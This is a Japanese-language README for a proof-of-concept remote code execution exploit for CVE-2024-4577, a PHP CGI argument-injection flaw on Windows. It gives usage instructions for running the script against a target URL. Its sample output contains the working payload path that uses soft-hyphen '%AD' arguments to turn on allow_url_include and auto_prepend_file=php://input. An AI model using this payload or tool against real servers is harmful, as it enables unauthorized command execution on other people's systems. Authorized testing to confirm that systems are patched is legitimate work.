
PHP <8.2.15(Windows)の重大な脆弱性に対する概念実証(PoC)RCEエクスプロイトで、攻撃者が任意のコマンドを実行できるようにします。
PHP の CGI モードには深刻なセキュリティ上の欠陥が存在し、攻撃者が URL パラメータを操作することで任意のコマンドを実行できるようになります。
スクリプトを実行する前に、システムに Python 3 がインストールされていることを確認してください。さらに、HTTP リクエストを処理するために requests ライブラリが必要です。
必要な依存関係は pip を使用してインストールできます。pip がインストールされていない場合は、こちら の手順に従ってください。
requests ライブラリをインストールします:pip install requests
CVE-2024-4577 の脆弱性について対象の URL を確認するには、次の手順に従います:
python3 exploit.py <target>
たとえば、URL http://example.com をテストするには、次のように実行します:
python3 exploit.py http://example.com
スクリプトは、指定された対象 URL の脆弱性をテストし、結果をコンソールに出力します。潜在的な脆弱性が検出されたか、脆弱性が検出されなかったかを示します。
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
この脆弱性は Orange Tsai (@orange_8361) によって発見されました。